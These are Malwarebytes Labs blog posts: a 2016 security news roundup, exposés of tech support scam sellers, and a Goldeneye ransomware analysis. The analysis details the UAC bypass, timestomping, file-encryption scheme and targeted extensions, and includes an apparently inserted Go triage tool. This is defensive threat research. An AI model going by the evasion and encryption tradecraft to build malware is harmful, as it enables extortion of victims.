  • ‘Proof of Concept’ Project Spawns Three Real-Life Ransomware Families. “Three new and real ransomware families have been spawned by the open-source CryptoWire ransomware project, which is uploaded as a ‘proof of concept’ on GitHub. The original of this ‘educational’ ransomware project was uploaded on GitHub in May this year by an anonymous user. CryptoWire contains a ZIP archive with the ransomware’s source code and a README file, in which the ransomware’s author is advertising their product’s features and capabilities. The project is still available for download.” (Source: Virus Guides)
  • Your Neighborhood ATM May Turn Into A Hacker’s Paradise. “The next time you queue up at the ATM for cash—an experience that has become increasingly onerous since demonetisation— it’s not just the long wait that should worry you. There’s a high probability the cash dispenser runs on software Microsoft stopped supporting more than two years back, thus making it vulnerable to hackers. Card details could be stolen—as they indeed were earlier this year–even as you fret about what to do with the solitary Rs 2,000 note the machine dispenses, if you’re lucky… About 70% of the 202,000 ATM machines in India run on Windows XP, for which Microsoft stopped offering security updates, patches and technical support in April 2014.” (Source: India Times)
  • Malicious Exploit Kit Targeting Internet Explorer Users, On Global Scale. “Researchers at ESET have discovered a new exploit kit spreading through the internet via malicious ads on reputable websites with high traffic. For the last two months, they’ve seen cybercriminals targeting users of Internet Explorer and scanning their computers for vulnerabilities in Flash Player. Hackers have been attempting to remotely download and execute various types of malware through loophole exploits.” (Source: Security Brief)
  • Scammers Spreading Celebrity Nude PDFs On Facebook, Pushing Malware Installation. “Google Chrome is one of the most used Internet browsers but lately, it is being used by cybercriminals and scammers to infect users with adware, malware and other malicious programs due to the low level of scrutiny on its web store. Recently, an Internet security firm Cyren discovered a malicious Chrome extension spreading nude celebrity PDFs all over the Internet including on Facebook. You might be thinking what’s the big deal about spreading PDFs? Well, that’s just the beginning of an irritating adware and malware campaign.” (Source: Hackread)
  • KFC Website Hacked, Colonel’s Club Loyalty Scheme Members Advised To Change Password. “Call in the Colonel! Popular fast food chain KFC has warned Colonel’s Club loyalty scheme members in the UK that its website has been targeted and multiple accounts may have been compromised. About 1.2 million members of the Colonel’s Club, which allows customers to collect Chicken Stamps and “earn their way to free food rewards,” recently received an email about the breach.” (Source: The International Business Times)
  • Connected Toys And Wearables For Christmas? Could Be A Cyber Security Risk. “ESET is warning consumers about connected gifts this Christmas season, as the popularity for devices such as wearables, connected toys and baby monitors continues to grow. The cyber security specialists warn these types of devices can be easily hacked by e-criminals, or turned into a threat to consumers’ privacy. ESET refers to a complaint that was lodged last week with the US Federal Trade Commission over internet-connected toys recording and transmitting kids’ conversations in violation of privacy rules.” (Source: NetGuide)
  • Nearly Half Of All Websites Pose Security Risks. “According to a new study of the top one million domains, 46 percent are running vulnerable software, are known phishing sites, or have had a security breach in the past twelve months. The big problem is that even when a website is managed by a careful company, it will often load content from other sites, said Kowsik Guruswamy, CTO at Menlo Park, Calif.-based Menlo Security, which sponsored the report, which was released this morning. For example, news sites — 50 percent of which were risky — typically run ads from third-party advertising networks.” (Source: CSO)
  • Zcash Mining Software Covertly Installed On Victims’ Machines. “Software ‘mining’ the recently established Zcash (ZEC) cryptocurrency is being foisted upon unsuspecting users, Kaspersky Lab warns. The actual software is not illegal, and not technically malware – it is meant to be used by individuals who are willing to dedicate their machine(s) and pay for the increased electricity usage that accompanies cryptocurrency mining. Unfortunately, there are unscrupulous individuals looking to get the coins without the cost, and they have been installing the software on users’ computers without permission.” (Source: Help Net Security)
  • Exclusive: SWIFT Confirms New Cyber Thefts, Hacking Tactics. “Cyber attacks targeting the global bank transfer system have succeeded in stealing funds since February’s heist of $81 million from the Bangladesh central bank as hackers have become more sophisticated in their tactics, according to a SWIFT official and a previously undisclosed letter the organization sent to banks worldwide. The messaging network in a Nov. 2 letter seen by Reuters warned banks of the escalating threat to their systems, according to the SWIFT letter. The attacks and new hacking tactics underscore the continuing vulnerability of the SWIFT messaging network, which handles trillions of dollars in fund transfers daily.” (Source: Reuters)
  • DDoS Attacks Have Gone From A Minor Nuisance To A Possible New Form Of Global Warfare. “In September 1996 an internet service provider (ISP) in New York was taken down by a flood of traffic. Computers elsewhere on the internet, controlled by hackers, were sending it up to 150 connection requests every second, far more than it could handle. It was the internet’s first major distributed denial-of-service, or DDoS, attack.” (Source: Quartz)
  • Hackers In Greater China Target Online Transactions, Building ‘Dossiers’ Of Information On Individuals, Expert Says. “Greater China is facing an increasing number of cyberattacks on online transactions, with e-commerce websites being the most vulnerable, according to a recent cybersecurity report. The increasing number of attacks on e-commerce websites come about as the trend of cross-border e-commerce continues to grow, with more consumers shopping online for the best deals, according to cybersecurity firm ThreatMetrix’s Q3 2016 cybercrime report.” (Source: Business Vancouver)
  • Forget The Home, Voice Assistants Are Invading The Workplace. “Much of the headlines about chatbots and digital assistants are focused either on the home or on social media platforms like Slack or Facebook. But what about the office? Are we going to stop talking to each other and start talking to bots? According to Spicework’s Future of IT report – surveying 560 IT pros globally – 19% of businesses are currently using intelligent assistants/chatbots for work-related tasks on company-owned devices, while another 30% are planning to use them in business over the next three years.” (Source: IDG Connect)
  • New Critical Fixes For Flash, MS Windows. “Both Adobe and Microsoft on Tuesday issued patches to plug critical security holes in their products. Adobe’s Flash Player patch addresses 17 security flaws, including one “zero-day” bug that is already actively being exploited by attackers. Microsoft’s bundle of updates tackles at least 42 security weaknesses in Windows and associated software. Half of the dozen patches Microsoft released yesterday earned its “critical” rating, meaning the flaws fixed in the updates could be exploited by malware or miscreants to seize remote control over vulnerable Windows computers without any help from users.” (Source: KrebsOnSecurity)
  • Filmmakers And Journalists To Camera Makers: Add Encryption. “More than 150 documentary filmmakers and photojournalists have a message for the world’s major camera companies: Build encryption features into your still and video cameras. The Freedom of the Press Foundation on Wednesday published an open letter signed by the likes of filmmaker and journalist Laura Poitras, director of the Oscar winning ‘Citizenfour’ and one of the people Edward Snowden first contacted with his NSA leaks, and Alex Gibney, who directed the acclaimed Scientology documentary ‘Going Clear’.” (Source: CNET)
  • ‘Secure the News’ Grades Media Sites On HTTPS—And Most Fail. “Before you enter your credit card into an unknown website, you probably (hopefully) check your browser for the padlock icon that means your connection to that site uses HTTPS encryption, which helps prevent hackers and eavesdroppers. But you probably don’t apply that same perfunctory padlock check to news sites, despite the fact that a media outlet’s lack of encryption can endanger journalists’ sources, expose your reading habits, and even allow censorship and tampering with stories. Now a new, constantly updated encryption ranking site performs that check for you—and may just help push more news organizations to better lock themselves down.” (Source: Wired)
  • Half Of The Web Is Vulnerable To Malware. “Menlo Security, a pioneer of malware isolation, today announced the availability of its State of The Web 2016 report. The surprising results reveal that nearly half (46%) of the Internet’s top 1 million web sites, as ranked by Alexa, are risky. This is largely due to vulnerable software running on web servers and on underlying ad network domains. The results are significant because risky sites have never been easier to exploit, and traditional security products fail to provide adequate protection. Attackers have their veritable choice of half the web to exploit, allowing them to launch phishing attacks from legitimate sites.” (Source: IT Security Guru)
  • Reschedule The Holiday Party, Patch Tuesday Is Here And It’s A Big One. “Security patches for Windows, Mac OS, iOS and other Apple firmware, and a host of Adobe products, were emitted this week. The final scheduled patch dump of the year sees Microsoft deliver fixes for multiple products, while Apple has security updates for iOS, Mac OS, Safari, and iTunes, and Adobe patches nine products including Flash Player and InDesign.” (Source: The Register)
  • Twitch Rolls Out Automated Tool To Stem Wave Of Chat Harassment. “With messages flying by at speeds literally too fast for a human to read, manual moderation is an uphill battle on some of the most popular Twitch channels. That situation has led to plenty of instances where popular streamers have been deluged with waves of racist or sexist abuse that even quality human moderators can have trouble stemming. Twitch is offering a new tool in the fight against chat room trolls today in the form of AutoMod. Rather than relying on humans to flag and take down inappropriate messages after they’re posted (and quite possibly after the streamer has already read them), AutoMod tries to detect those messages automatically and preemptively send them to a moderation queue for approval or dismissal.” (Source: Ars Technica)
  • Affordable Android Phones Coming With Malware Injected In Stock Firmware. “Russian security company Dr. Web, which also makes a PC antivirus solution bearing the same name, warns that it discovered a total of 26 smartphone models running Android and infected with malware that’s injected in the stock firmware they are shipped with. Most of the models on the list, which you find in full at the end of the article, are smartphones sold on the Russian market and based on the MTK platform, which is a chipset developed by Taiwan-based MediaTek. The list includes phones sold by Prestigio, Irbis, MegaFon, and SUPRA.” (Source: Softpedia)
  • The Human Factor In Information Security. “No one can deny that cyberattacks are the new norm. Such risks will increasingly challenge our ability to operate our businesses. In the world of cybercrime, everyone — from individuals to nation-states — is a target. However, some targets are more alluring than others. Legal, accounting and other professional firms are increasingly targeted by cybercriminals and hackers who are intent on accessing the vast stores of data with which they are entrusted. Indeed, hackers focus a greater percentage of their attacks on the financial services and health care industries than other areas because of the large amounts of data they hold.” (Source: Legal Tech News)
  • Stop Using Netgear Routers With Unpatched Security Bug, Experts Warn. “A variety of Netgear router models are vulnerable to a simple hack that allows attackers to take almost complete control of the devices, security experts warned over the weekend. The critical bug allows remote attackers to inject highly privileged commands whenever anyone connected to the local Netgear network clicks on a malicious Web link, a researcher who uses the online handle Acew0rm reported on Friday. The link, which can be disguised to appear innocuous, then injects a command that routers run as root. The devices’ failure to properly filter out input included in Web requests allows attackers to run powerful shell commands.” (Source: Ars Technica)
  • Uber ‘God View’ Allowed Staff To Spy On High-profile Politicians, Ex-partners And Beyoncé, Court Hears. “Samuel Ward Spangenberg is suing his former employer, minicab firm Uber, claiming that he suffered age discrimination and retaliation after whistle-blowing on some of the company’s practices. As The Center for Investigative Reporting describes, Uber’s former forensic investigator claims that staff regularly snooped on customer records in order to spy on the movements of celebrity customers, ex-partners and spouses. One of those allegedly snooped upon was pop superstar Beyoncé.” (Source: Graham Cluley’s Blog)
  • The Rising Use Of Personal Identities In The Workplace. “90% of enterprise IT professionals are concerned that employee reuse of personal credentials for work purposes could compromise security. However, with 68% saying they would be comfortable allowing employees to use their social media credentials on company resources, Gemalto’s research suggests that personal applications (such as email) are the biggest worry to organisations. The enterprise and consumer worlds are merging closer together, with enterprise security teams under increasing pressure to implement the same type of authentication methods typically seen in consumer services, such as fingerprint scanning and iris recognition. 62% believed this was the case, with 63% revealing they feel security methods designed for consumers provide sufficient protection for enterprises. In fact, 52% believe it will be just three years before these methods merge completely.” (Source: Help Net Security)
  • Insecure Pagers Give Hackers An Entry Way Into Voice Mails, Conference Calls. “All it takes is a $20 dongle and some patience, and an attacker can listen into a company’s pager communications — including transcribed voice mail messages and dial-in instructions for conference calls. There are many voicemail services that automatically transcribe voice mail messages, according to a new report by Trend Micro. In some cases, those messages are forwarded to employees via their pagers.” (Source: CSO)
  • Nymaim Using MAC Addresses To Uncover Virtual Environments And Bypass Antivirus. “Nymaim, a malware family connected to several online ransom campaigns in recent years, is retrieving network card MAC addresses and using them to uncover virtual environments, thwarting automated antivirus analysis tools in the process. Virtualized environments are widely used in large organizations trying to simplify IT by only giving users a thin client, according to SophosLabs researcher Sandor Nemes. It’s also where antivirus researchers deploy the sandboxes they use for automated malware analysis. By going around virtualized environments, Nymaim loses potential targets. But it escapes the automated antivirus sandboxes, which can buy an attacker precious time, Nemes said.” (Source: Sophos’s Naked Security Blog)
  • BugSec, Cynet Discover Critical Flaw Allowing Attackers To Read Private Facebook Messenger Chats. “The root of the vulnerability was a cross-origin problem in Facebook’s implementation, which would allow an attacker to bypass Facebook’s origin checks and access messages from an external website. ‘This security flaw meant that the messages of 1-billion active monthly Messenger users were vulnerable to attackers,’ said Stas Volfus, Chief Technology Officer of BugSec. To exploit the vulnerability, the victim would have to visit a malicious website controlled by the attacker. From that moment, all messages sent or received by the victim would be accessible to the attacker. Said Volfus, ‘This was an extremely serious issue, not only due to the high number of affected users, but also because even if the victim sent their messages using another computer or mobile, they were still completely vulnerable. Facebook realized the potential severity, and responded quickly, verifying the flaw and fixing it.’” (Source: PR Web)
  • Cyber Criminals Are Getting Smarter But Businesses Only Act When Targeted, Experts Warn. “As the dissemination of data and information becomes more and more advanced – the rise of the digital age makes a lot of tasks a whole lot easier, but so does the risk of cyber-attacks. Cyber-attacks can come in many forms, however, the most prevalent target for these criminals are collecting confidential information and stealing money.” (Source: Malaysian Digest)
  • Say Good-bye To Microsoft Security Bulletins. “This is the last month we’ll see security bulletins from Microsoft—and I can’t wait. Patch numbers are currently interlocked, with security bulletins referencing KB numbers that aren’t available in the Windows 10 cumulative updates or in the Windows 7/8.1 security-only or monthly rollup patches. But hang in there, it will get less complicated next month. I hope.” (Source: InfoWorld)
  • Non-Malware Attacks On The Rise, In The Shadow Of Ransomware. “2016 saw attackers holding data for ransom at an alarming rate; but in conjunction with the rise of ransomware and the continued ubiquity of mass malware, attackers are increasingly utilizing non-malware attacks in an attempt to remain undetected and persistent in organizations’ networks. According to Carbon Black data, these non-malware attacks are capable of gaining control of computers without downloading any files and are using trusted, native operating system tools (such as PowerShell) and exploiting running applications (such as web browsers and Office applications) to conduct malicious behavior.” (Source: InfoSecurity Magazine)
  • Hackers Get Around AI With Flooding, Poisoning And Social Engineering. “Machine learning technologies can help companies spot suspicious user behaviors, malicious software, and fraudulent purchases — but even as the defensive technologies are getting better, attackers are finding ways to get around them. Many defensive systems need to be tuned, or tune themselves, in order to appropriately respond to possible threats.” (Source: CSO)
  • The Economics Of Ransomware Revealed. “70 percent of businesses infected with ransomware have paid ransom to regain access to business data and systems. In comparison, over 50 percent of consumers surveyed said they would not pay to regain access back to personal data or devices aside from financial data, according to IBM Security. IBM X-Force surveyed 600 business leaders and more than 1,000 consumers in the U.S. to determine the value placed on different types of data.” (Source: Help Net Security)
  • The Government Body That Oversees The Security Of Voting Systems Was Itself Hacked. “The U.S. Election Assistance Commission, which is responsible for testing and certifying voting systems, among other things, was hacked around the time of the election, security outfit Recorded Future reports. The EAC confirmed a ‘potential intrusion’ in a statement issued to TechCrunch. This isn’t a smoking gun for a stolen election or anything like that; the EAC doesn’t actually run the elections, nor does it handle voter information. But it is a shameful display all the same, especially considering how loudly and frequently the hacking threat has been bruited by officials this year.” (Source: TechCrunch)
  • Ashley Madison Settles Charges Over Its Massive Data Breach. “Ashley Madison is paying the price for the hack that exposed the info of 36 million customers, and we don’t just mean through executive departures. The owners of the cheat-on-your-spouse site, Ruby Corp, have settled charges from both the US Federal Trade Commission and 13 states alleging that it both misled users and didn’t do enough to protect their info. The actual fine is small — Ashley Madison was intended to pay a total of $17.5 million, but can only afford to pay just over $1.6 million. However, the reforms may go a long way toward solving some of the underlying problems that led to both the breach and shady business practices.” (Source: Engadget)
  • Contactless Payments: Addressing The Security Issues. “The emergence of contactless payments on mobile phones is changing the way transactions are authenticated and secured, says Jeremy King, international director of the PCI Security Standards Council. In a contactless environment, on mobile devices in particular, biometrics authentication can replace the need to use PIN entry as an additional authentication layer, King says in this interview conducted at Information Security Media Group’s recent Fraud & Breach Prevention Summit in London.” (Source: InfoRisk Today)
  • New ‘Giveaways’ Target Shoppers Searching For Hatchimals And Other Hot Toys. “During the holiday season, parents scrambling at the last minute to purchase toys at the top of their children’s wish lists will often go to great lengths to deliver. Scammers are taking advantage of this and are promoting fake Hatchimal giveaways to trick parents into disclosing bank information and other personal data, warns social media security company ZeroFOX. Fake coupons, merchandise and gift card generators are also being used to target shoppers.” (Source: Forbes)
  • Cerber Ransomware Spreads via Fake Credit Card Email Reports. “Just in time for the Christmas holiday shopping spree, the group behind the Cerber ransomware has launched a spam campaign that uses fake credit card reports to trick users into opening a Word file that under certain circumstances will download and install the deadly Cerber ransomware. Detected by the staff of the Microsoft Malware Protection Center, the emails in this spam campaign pretend to be pending payments for MasterCard credit cards.” (Source: Bleeping Computer)
  • Malvertising Campaign Targets Routers And Every Device Connected To Router. “Well this is just peachy – cybercriminals are actively using a malvertising campaign that infects routers and even Android devices. If the router is pwned, then every device connected to that router is pwned. Proofpoint researchers warned that cyber thugs are using a new and improved version of the DNSChanger exploit kit (EK) for this malvertising campaign. Generally, malvertising involves an attacker injecting malware into ads which can infect via browsers and attack a victim’s computer after simply visiting an affected page.” (Source: Computer World)

Safe surfing, everyone!

The Malwarebytes Labs Team


Scam as a service 2: the B team

Malwarebytes - Mon, 12/19/2016 - 19:00

It’s easy to run into mentions of the Darknet and its many ills, real or imagined. Even the late CSI: Cyber made frequent reference to the Darknet. Interest in Tor-based threats is increasing to the extent that some vendors will scoop up all activity they find on Tor and provide you a nice front end to search through it at your leisure. This might lead the casual observer to assume that the darkness is a one-stop shop for cyber threats, but criminals existed on the internet prior to Tor, and still do quite well for themselves without it. In fact, bad guys with good OPSEC tend to be the exception, rather than the rule. So let’s take a quick look at some unpleasant stuff and the nadir of bad OPSEC, Facebook.

We’ve blogged previously on the Scam in a Box. But more common are bad guys simply selling lock screens, phone support lead generation, or both.

These posts are fairly common, leading some criminals to differentiate their offerings with custom tooling as follows:

Following the trend we’ve observed of higher-tier scammers escalating their tactics to stay ahead of enforcement measures, “Windows activation” calls are seeing a surge in popularity. The PPI, or Pay Per Install, referred to below is a great way of driving victim calls to a call center without any web-based infrastructure that can be used to track the scammer down later.

But what about ad networks cracking down on tech support scams? What about popular search engines disallowing third party tech support sites in their rankings at all? How could such a thriving criminal marketplace exist under these conditions? Well, it largely doesn’t. A significant portion of these postings are themselves scams, designed to take a criminal’s money in exchange for a non-functional product, or sometimes nothing at all. Here’s a post linked from a public Facebook profile.

Things wrong with this picture:

  1. Google adwords banned these sorts of campaigns years ago.
  2. The poster doesn’t seem to understand why you might need to rotate account details when promoting something harmful/illegal.
  3. Rs.500 is about 7.50 USD. If Rs.60000 was insufficient to evade Google counter-fraud measures, it seems improbable that the price of a cup of soup could buy you better service.
  4. The poster included his name and contact information at the bottom of the post. (not pictured)

Why is this sort of thing trivially easy to find? To hazard a guess, most large-platform content security monitoring is done algorithmically, with a weighted list of phrases and words that elevate items to a human analyst. Doing so with tech support scams runs a huge chance of false positives flagging legitimate outsourced service centers. In all probability, a human security analyst never sees any of these posts and therefore can’t act against them.

So to sum up, tech support scams have a robust tooling and infrastructure market, out in the open with no obfuscation whatsoever. Some scammers will specify Indian clients only as a crude way of vetting, but most don’t. They operate profitably and with impunity, based largely on a belief that distance from the United States makes them untouchable. Also, based on the frequency and vehemence of “BPO Scammer” posts, a not-insignificant minority seem to believe that what they’re doing isn’t actually illegal. Suffice it to say, Malwarebytes disagrees.


Tech support scams, stolen data, and botnets

Malwarebytes - Thu, 12/15/2016 - 19:00

NOTE: thanks to the Wack0lian for research contributions


It would seem that scams as a service are a growth business model. Last time, we looked at inboundpopaps[.]info, a slick scam in a box designed to get even the most technically illiterate criminals up and running and stealing from you. Today we’ve found something a little more interesting – a scam in a box company that also offers intelligence leads. That is, they’ll sell you the scam and point you at the most vulnerable targets first.

In July of 2014, someone posting under the name BPO Resources posted the following on an outsourced IT services forum.

Typically, tech support callers are noted for not knowing the slightest thing about the people they call, so targeted leads for a specific company’s customers were interesting. Almost identical verbiage appears on bpoexpertsglobal.blogspot.com.

This time though, the threat actor also has the personal data of elderly ISP customers on offer. This was less surprising, as scammers of all sorts prefer to victimize the elderly. Given that this guy appears to be diversifying his crime verticals, what might he be offering more recently? Searching for BPO Experts Global turned up a YouTube channel of the same name, where the scammer is kind enough to demonstrate the screen locker he currently has for sale. (We’ve written about these lockers here.) If you’ve been hit by this sort of thing, be sure to check out our forums for removal guides. Let’s allow the scammer to speak for himself for a minute:

“this is the software which I have created”

“Going now to the secure, bulletproof server”


Here’s the back end login panel, with a fun graphic when you enter an incorrect password.


And here we have the panel itself, where the author brags about being able to trigger popups and invisible URLs, and to download and execute exes on the victim’s machine, all without any UAC alerts on a Windows machine. A botnet, in other words. So we have a threat actor progressing from selling leads, to selling stolen data, to selling screen lockers in support of other scammers. But who is this guy and how does he have Dell customer data? Let’s start with where he is.

While infecting himself with his own product, he forgot to blank out his own IP, which is registered to a broadband company in Bangalore. The footnote at the bottom of the panel says “Accelerit Solutions”, which yields a homepage of systemnetworksecure.com. The site and its phone number show up in extensive comment spam and various tech support scam pitches, but do not offer up any personal details. Searching directly on the company name is more interesting.

He apparently also doesn’t play nice with his customers, as we can see in reference to a previous iteration of his site. If you’ll recall, BPOresources was the name of the account that made the original forums posting in 2014.

And lastly, he’s a member of a Facebook group that openly sells pre-fab tech support scam pages.

So we have a pretty good idea of who’s behind BPO Experts Global. But how did they get the Dell customer data? Well, possibly in several ways. Back in January, Ars Technica wrote about a wave of tech support scam calls targeting Dell customers with apparently accurate purchase information. That article referenced a vulnerability disclosed 11/25/2015 here (followup here) involving a vulnerable preinstalled certificate that can be used to leak a Dell owner’s service tag. Brian Krebs followed up citing the same vulnerability, and referencing an ongoing Dell investigation.

Mr. X didn’t necessarily have to make use of the vulnerability himself. Tech support scammers are renowned for their quick sharing of TTPs, and presumably once one scammer gained access to Dell customer data, he quickly sold and resold it to others. Given that the original forum post was dated 2014, it’s likely that the data cache is widely available on the underground in India. Although, as we’ve seen above, scammers largely feel free to conduct their business in the open, on US social media and in English.

Mr. X’s tech support botnet is not the first we’ve seen. He falls into a trend we’ve observed recently of the more enterprising scammers adapting to changing search engine policies banning remote tech support listings and upgrading their techniques to more sophisticated, more damaging methods that closely resemble established malware. As the less technically adept criminals get squeezed out, it’s reasonable to expect that we’ll see the remaining scammers improve, adapt, and overcome.


Goldeneye Ransomware – the Petya/Mischa combo rebranded

Malwarebytes - Thu, 12/15/2016 - 16:00

Since March 2016 we’ve observed the evolution of an interesting low-level ransomware, Petya – you can read about it here. The second (green) version of Petya comes combined with another ransomware packed in the same dropper, Mischa. The latter was deployed as an alternative payload, in case the dropper was run without administrator privileges and the low-level attack was impossible. This combo is slowly reaching maturity – the authors fixed the bugs that allowed decryption of the two earliest versions. Now we are facing an outbreak of the fourth version, this time under a new name, Goldeneye, and, appropriately, a new golden theme.

In this post we will take a look inside, in order to answer the question of whether or not any internal changes followed the external alterations.

Analyzed sample

// special thanks to @procrash

Distribution

Currently Goldeneye is distributed by phishing e-mails, in campaigns targeting Germany. The same distribution pattern was observed in the first editions of Petya ransomware. Germany seems to be an environment familiar to this ransomware author (who is probably a native German speaker), and his testing campaigns are always released in that country. However, the threat will probably go global again, as the affiliate program for other criminals is going to be released soon.

Behavioural analysis

After being run, the malware installs its copy in the %APPDATA% directory, under the name of a random application found in the system:

The installed copy is automatically executed and proceeds with malicious actions.

In the past, the dropper of Petya/Mischa used to trigger a UAC popup window. If the user had agreed to run the sample as the Administrator, he/she was attacked by the low-level payload: Petya. Otherwise, the high-level Mischa was deployed.

In the current case the attack model is different and looks more like that of Satana ransomware.

First, the high-level attack is deployed and the files are encrypted one by one. Then the malware tries to bypass UAC and elevate its privileges on its own, in order to carry out the second attack, this time at the low level: installing Petya at the beginning of the disk. The bypass works silently if UAC is set to the default level or lower. Where UAC is set to the maximum, the following window pops up repeatedly until the user accepts the elevation:

The bypass technique used works on both 32-bit and 64-bit versions of Windows, up to Windows 8.1. On Windows 10, a popup is displayed even if UAC is set to default – but it does not reveal the real name of the infecting program, i.e.

The high-level part (former Mischa)

On the first stage of the attack, files are being encrypted one by one. The malware drops the following note in TXT format:

Encrypted files are given random extensions:

If we have two files with the same plaintext they turn into two different cipher-texts – that indicates that each file is encrypted with a new key or initialisation vector. The high entropy suggests AES in CBC mode (just like in previous editions of Mischa).

Visualization – original file vs encrypted one:


The low-level part (former Petya)

The second stage of the infection is deployed after the files are encrypted. The behaviour of the second payload is no different from the previous versions of Petya. After the malware is deployed, the system crashes and restarts with a fake CHKDSK. It pretends to be checking the disk for errors, but in reality it encrypts the Master File Table using Salsa20. Once that is completed, we are facing the familiar blinking skull – this time in yellow/golden colour:

After pressing a key, we can see the screen with the ransom note:

Page for the victim

In every edition, all the pieces of the ransomware have had a consistent theme. This time is no different. The page for the victim, hosted on a Tor-based site, comes in a theme very similar to that of the ransomware itself:

After paying the ransom, the victim is provided with a key to decrypt the first (bootlocker) stage and a decrypter to recover the files:

The decrypter requires having a proper key in order to work:

Affiliate program

In the past, the Petya/Mischa combo was available as RaaS (Ransomware as a Service). Following the changes in the layout, the Twitter account associated with the criminal(s) behind the malware also changed its profile theme and updated the information about the affiliate program status:

This confirms that neither the actor behind Goldeneye nor the methods of redistributing it have changed.

Inside

This ransomware is very complex, with multiple pieces that have already been described in our previous articles. That’s why in this one we will focus only on the differences compared to the previous editions. Let’s start from core.dll, the PE file that we get after unpacking the first layer.

The core.dll

Just like in the previous versions, the main application is a DLL (core.dll), packed by various crypters and loaded by a technique known as Reflective Loader.

In the past Petya and Mischa were two separate modules delivered by this DLL. The dropper decided which one to deploy by attempting to run the sample with Administrator privileges – no UAC bypass was used, only social engineering. Now, however, it comes with two DLLs that perform a UAC bypass – one for the 32-bit and another for the 64-bit variant of Windows. It decides which one to deploy based on the detected architecture.

The internal logic of this module changed a bit. There is no longer a separate Mischa.dll. Instead, core.dll covers the functionality of encrypting files as well as installing the disk locker afterwards. The payloads are XOR encrypted and stored in the last section of the PE file (.xxxx):

Section .xxxx contains:

  • the low level part (former Petya)
  • 32 bit DLL (elevate_x86.dll)
  • 64 bit DLL (elevate_x64.dll)

(The two DLLs used for the UAC bypass are based on a technique similar to the one described here.)

At first run, the core module makes its own copy into %APPDATA% and applies some tricks to blend into the environment:

  • Choosing the application name at random, out of various applications in the System folder
  • Changing its own timestamp to the timestamp of Kernel32.dll (the so-called “timestomping” technique).
  • Adding to its resources the resources of the genuine Microsoft application under whose name it is installed:

Result:

Some of those tricks remind us of Cerber ransomware and they were probably inspired by it.
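The tricks above leave artifacts that an analyst can look for in a user’s %APPDATA% directory. The following Go program is an added example (not code from the post or from Malwarebytes): it walks a directory and flags files whose modification time is identical to a reference time, i.e. the timestamp the dropper copies from kernel32.dll on the examined machine, and files whose name collides with a list of known system applications. Both the reference time and the name list are inputs the analyst supplies; the directory scanned in the demo is constructed test data. One assumption: the copied timestamp is treated here as the file-system modification time.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"strings"
	"time"
)

// finding describes one suspicious file found during triage.
type finding struct {
	Name    string
	Path    string
	Reasons []string
}

// triageAppData flags files whose modification time exactly equals refTime
// (the timestamp copied from kernel32.dll, supplied by the analyst) and files
// whose name reuses that of a known system application (systemNames, also
// supplied by the analyst, lower-cased).
func triageAppData(dir string, refTime time.Time, systemNames map[string]bool) ([]finding, error) {
	var findings []finding
	err := filepath.WalkDir(dir, func(path string, d os.DirEntry, err error) error {
		if err != nil || d.IsDir() {
			return err
		}
		info, err := d.Info()
		if err != nil {
			return err
		}
		var reasons []string
		// Exact equality is the tell: legitimate files in a profile directory
		// practically never share a timestamp to the nanosecond with kernel32.dll.
		if info.ModTime().Equal(refTime) {
			reasons = append(reasons, "modification time identical to kernel32.dll")
		}
		if systemNames[strings.ToLower(d.Name())] {
			reasons = append(reasons, "name collides with a system application")
		}
		if len(reasons) > 0 {
			findings = append(findings, finding{Name: d.Name(), Path: path, Reasons: reasons})
		}
		return nil
	})
	return findings, err
}

// buildSampleDir creates a throwaway directory for the demo. This is
// constructed test data, not a real infection: one benign file, one file that
// both reuses a system name and carries the copied timestamp, and one file
// where only the timestamp matches.
func buildSampleDir(refTime time.Time) (string, error) {
	dir, err := os.MkdirTemp("", "appdata-triage")
	if err != nil {
		return "", err
	}
	files := map[string]time.Time{
		"notes.txt":   refTime.Add(-48 * time.Hour),
		"calc.exe":    refTime,
		"updater.bin": refTime,
	}
	for name, mtime := range files {
		p := filepath.Join(dir, name)
		if err := os.WriteFile(p, []byte("constructed content"), 0o600); err != nil {
			return "", err
		}
		if err := os.Chtimes(p, mtime, mtime); err != nil {
			return "", err
		}
	}
	return dir, nil
}

func main() {
	// Constructed reference time standing in for kernel32.dll's timestamp.
	ref := time.Date(2016, 12, 10, 8, 30, 0, 0, time.UTC)
	dir, err := buildSampleDir(ref)
	if err != nil {
		fmt.Println(err)
		return
	}
	defer os.RemoveAll(dir)
	findings, _ := triageAppData(dir, ref, map[string]bool{"calc.exe": true, "notepad.exe": true})
	for _, f := range findings {
		fmt.Println(f.Path, "->", strings.Join(f.Reasons, "; "))
	}
}
```

On a real machine the reference time comes from the kernel32.dll in the System folder, and the name list from a directory listing of that folder; a file that trips both checks, as calc.exe does in the demo, deserves a closer look before any of the other tricks listed above are even considered.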

Then, the dropper deploys the installed copy and proceeds with encryption.

The file cryptor (former Mischa)

The file cryptor feature is now implemented inside the core.dll.

It behaves similarly to the former Mischa ransomware – the only difference is that now it is employed before the low-level attack, rather than being an alternative.

Attacked targets

Files with the following extensions are attacked:

doc docx docm odt ods odp odf odc odm odb xlsm xlsb xlk xls xlsx pps ppt pptm pptx pub epub pdf jpg jpegB rtf txt frm wdb ldf myi vmx xml xsl wps cmf vbs accdb cdr svg conf cfg config wb2 msg azw azw1 azw3 azw4 lit apnx mobi p12 p7b p7c pfx pem cer key der mdb htm html class java cs asp aspx cgi h cpp php jsp bak dat pst eml xps sqllite sql js jar py wpd crt csv prf cnf indd number pagesN po dcu pas dfm directory pbk yml dtd rll cert p12 cat inf mui props idl result localstorage ost default json db sqlite bat x3f srw pef raf orf nrw nef mrw mef kdc dcr crw eip fff iiq k25 crwl bay sr2 ari srf arw cr2 raw rwl rw2 r3d 3fr ai eps pdd dng dxf dwg psd ps png jpe bmp gif tiff gfx jge tga jfif emf 3dm 3ds max obj a2c ddspspimage yuv 3g2 3gp asf asx mpg mpeg avi mov flv wma wmv ogg swf$ ptx ape aif wav ram ra m3u movie mp1 mp2 mp3 mp4 mp4v mpa mpe mpv2 rpf vlc m4a aac aa aa3 amr mkv dvd mts qt vob 3ga ts m4v rm srt aepx camproj dash zip rar gzip vmdk mdf iso bin cue dbf erf dmg toast vcd ccd disc nrg nri cdi

Encryption

Files are read in chunks of 1024 bytes each. Then, they are processed by the built-in implementation of AES.

The easiest way to analyse the encryption algorithm used is by reversing the original decrypter, provided by the ransomware author to victims that paid the ransom. The decrypter is written in .NET and is not obfuscated.

Looking at the decrypter code we can confirm that each file is encrypted using AES in CBC mode. The AES key is 32 bytes long, and it is taken from the beginning of the SHA512 hash of the password.

The initialisation vector is random for every file and it is stored in its content:
